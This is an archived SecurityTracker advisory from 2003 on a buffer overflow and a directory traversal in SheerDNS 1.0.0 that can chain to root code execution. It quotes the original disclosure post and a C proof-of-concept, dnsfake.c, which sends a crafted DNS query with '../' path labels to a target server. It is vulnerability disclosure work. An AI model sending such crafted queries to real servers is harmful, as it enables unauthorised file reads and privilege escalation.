SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   SheerDNS Vendors:   Sheer, Paul
SheerDNS Directory Traversal and Buffer Overflow Bugs Allow Local Users (and Possibly Remote Users) to Gain Root Privileges
SecurityTracker Alert ID:  1006562
SecurityTracker URL:  http://securitytracker.com/id/1006562
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 13 2003
Impact:   Execution of arbitrary code via local system, Execution of arbitrary code via network, Root access via local system, Root access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 1.0.0
Description:   Some vulnerabilities were reported in SheerDNS. A local user can gain root privileges on the system. A remote user with the ability to upload files to the system can gain root privileges.

A buffer overflow was reported in the processing of CNAME requests. The flaw reportedly resides in 'sheerdns.c', where a 1024 byte 'lookup_results' variable that is determined based on the contents of a local file is copied to a 256 byte variable. By itself, this flaw allows a local user that can create SheerDNS files to obtain root privileges (but that person may already have root privileges). However, this flaw, in conjunction with the one described below, may allow for additional exploit scenarios.

It is also reported that a remote user can exploit a flaw in the directory_lookup() function to cause SheerDNS to read from an arbitrary file on the system. The file names are reportedly of the following form:

/var/sheerdns/<zone>/<type>

The report indicates that SheerDNS does not filter user supplied input to ensure that the proper files are read. A remote user can submit a specially crafted CNAME request to cause SheerDNS to read from an arbitrary file on the system with root privileges. If the target file has been specially crafted (by a local user or by a remote user with some upload privileges), the buffer overflow described above can be triggered, causing arbitrary code to be executed with root privileges.

Impact:   A local user or a remote user with file upload privileges can cause arbitrary code to be executed with root privileges.
Solution:   The vendor has released a fixed version (1.0.1), available at:

http://threading.2038bug.com/sheerdns/sheerdns-1.0.1.tar.gz

Vendor URL:  threading.2038bug.com/sheerdns/ (Links to External Site)
Cause:   Boundary error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Multiple vulnerabilities in SheerDNS



--oC1+HKm2/end4ao3
Content-Type: multipart/mixed; boundary="TB36FDmn/VVEgNH/"
Content-Disposition: inline


--TB36FDmn/VVEgNH/
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable


Date    : 04/13/2003
Product : SheerDNS
Author  : Frank Denis <j@pureftpd.org>


   ------------------------[ Product description ]------------------------
    =20
  SheerDNS was written to be a simple replacement master DNS server that can
be used where atomic updates are required. Because it stores each record in
a small file, updating records does not require the sheerdns process to be
notified or restarted. Each update is immediately available and served as-i=
s.=20

  SheerDNS is extremely light-weight, simple, and fast, and written with
security in mind.=20

  Home page : http://threading.2038bug.com/sheerdns/


     ------------------------[ Vulnerabilities ]------------------------
 =20
  Two main vulnerabilities were found in SheerDNS 1.0.0 .
 =20
 * Buffer overflow in CNAME handling.
=20
  There's buffer overflow in the way SheerDNS constructs a reply when
answering a CNAME request. See line 385 of sheerdns.c :

  strcpy ((char *) query, lookup_results[0]);

  query is a 256 bytes buffer on the stack, while lookup_results[0] can be
up to 1024 bytes (see dir.c) .

  Lookup results are read from local files, hopefully created by trusted
processes. However, a second vulnerability can break this.

 * Directory traversal in directory_lookup().
=20
  The point in SheerDNS is that data is directly served from files. Thus, a
request for the <type> record of the <zone> zone results in reading a file
whoose location is :

  /var/sheerdns/<zone>/<type>
 =20
  However, SheerDNS 1.0.0 doesn't sanitize the requested zone.
 =20
  Using a specially crafted DNS request, an arbitrary directory can be read,
moreover SheerDNS needs root privileges and doesn't chroot.

  The attached proof-of-concept makes it read the /tmp/passwd/ directory.
 =20
 * If an untrusted user can create files with arbitrary names on a server
running SheerDNS, both vulnerabilities can be combined. SheerDNS can be
forced to read any untrusted file whoose name is "CNAME" and whoose content
will trigger the query[] buffer overflow.


    ------------------------[ Affected versions ]------------------------
   =20
  Both vulnerabilities have been confirmed on SheerDNS 1.0.0 .
 =20
 =20
 ------------------------[ Vendor status and fixes ]------------------------
     =20
  SheerDNS author Paul Sheer addressed these vulnerabilities the day they
were reported, among with some other problems.

  SheerDNS 1.0.1 is now available for download from the project's main site.
   =20
--=20
 __  /*-      Frank DENIS (Jedi/Sector One) <j@42-Networks.Com>     -*\  __
 \ '/    <a href=3D"http://www.PureFTPd.Org/"> Secure FTP Server </a>    \'=
 /
  \/  <a href=3D"http://www.Jedi.Claranet.Fr/"> Misc. free software </a>  \/

--TB36FDmn/VVEgNH/
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="dnsfake.c"
Content-Transfer-Encoding: quoted-printable


/*
 * SheerDNS 1.0.0 directory traversal POC.
 * Jedi/Sector One <j@pureftpd.org>
 */

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <getopt.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

void fill(char * const msg_, size_t *len)
{
    register char *msg =3D msg_;
   =20
    /* ID */
    *msg++ =3D 2;
    *msg++ =3D 4;
   =20
    /* QR/OPCODE/AA/TC/RD/RA/Z */
    *msg++ =3D 5;
    *msg++ =3D 0;
   =20
    /* QDCOUNT */
    *msg++ =3D 0;
    *msg++ =3D 1;

    /* ANCOUNT */
    *msg++ =3D 0;
    *msg++ =3D 0;

    /* NSCOUNT */
    *msg++ =3D 0;
    *msg++ =3D 0;

    /* ARCOUNT */
    *msg++ =3D 0;
    *msg++ =3D 0;
   =20
    /* QUERY */
   =20
    *msg++ =3D 3; strcpy(msg, "../"); msg +=3D 3;
    *msg++ =3D 2; strcpy(msg, "./"); msg +=3D 2;
    *msg++ =3D 2; strcpy(msg, "./"); msg +=3D 2;
    *msg++ =3D 2; strcpy(msg, "./"); msg +=3D 2;
    *msg++ =3D 2; strcpy(msg, "./"); msg +=3D 2;   =20

    *msg++ =3D 12; strcpy(msg, "/tmp/passwd"); msg +=3D 11; *msg++ =3D 0;=
=20
   =20
    *msg++ =3D 0;
   =20
    /* QTYPE */
    *msg++ =3D 0;
    *msg++ =3D 1;
   =20
    /* QCLASS */
    *msg++ =3D 0;
    *msg++ =3D 1;
   =20
    /* FCS */
    *msg++ =3D 0xc8;
    *msg++ =3D 0x4c;
   =20
    /* STOP */
    *msg++ =3D 0x7e;
   =20
    *len =3D (size_t) (msg - msg_);
}

void usage(const char * const prgname)
{
    printf("Usage : %s [-s <source host>] -t <target host>\n",
           prgname);
    exit(0);
}

int main(int argc, char *argv[])
{
    char msg[65500];
    struct addrinfo hints, *res;
    const char *source_host =3D NULL;
    const char *target_host =3D NULL;
    size_t len;
    int kindy;
    int fodder;
   =20
    while ((fodder =3D getopt(argc, argv, "s:t:")) !=3D -1) {
        switch (fodder) {
        case 's' :
            if ((source_host =3D strdup(optarg)) =3D=3D NULL) {
                perror("strdup");
                return 1;
            }
            break;
        case 't' :
            if ((target_host =3D strdup(optarg)) =3D=3D NULL) {
                perror("strdup");
                return 1;
            }
            break;
        default :
            usage(argv[0]);
        }
    }
    if (source_host =3D=3D NULL || target_host =3D=3D NULL) {
        usage(argv[0]);
    }
    fill(msg, &len);
    memset(&hints, 0, sizeof hints);
    hints.ai_family =3D AF_UNSPEC;
    hints.ai_addr =3D NULL;
    if ((fodder =3D getaddrinfo(source_host, NULL, &hints, &res)) !=3D 0) {
        fprintf(stderr, "getaddrinfo : %s\n", gai_strerror(fodder));
        return 1;
    }   =20
    if ((kindy =3D socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP)) =3D=3D -1) {
        perror("socket");
        return 1;
    }
    if (bind(kindy, (struct sockaddr *) res->ai_addr,
             res->ai_addrlen) !=3D 0) {
        perror("bind");
        return 1;
    }
    memset(&hints, 0, sizeof hints);
    hints.ai_family =3D AF_UNSPEC;
    hints.ai_addr =3D NULL;
    if ((fodder =3D getaddrinfo(target_host, "domain", &hints, &res)) !=3D =
0) {
        fprintf(stderr, "getaddrinfo : %s\n", gai_strerror(fodder));
        return 1;
    }
    if (sendto(kindy, msg, len, 0, (const struct sockaddr *) res->ai_addr,
               (socklen_t) res->ai_addrlen) <=3D (ssize_t) 0) {
        perror("sendto");
        return 1;
    }
    (void) close(kindy);
   =20
    return 0;
}

--TB36FDmn/VVEgNH/--

--oC1+HKm2/end4ao3
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (OpenBSD)

iD8DBQE+mYn+kmvFFxzepDkRAiGVAKCuqutbF/htomY5gXJAGECHoh9yxQCgtW1E
DRG8JQcXxEVvrXYtWJm3GMA=
=jEQK
-----END PGP SIGNATURE-----

--oC1+HKm2/end4ao3--
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC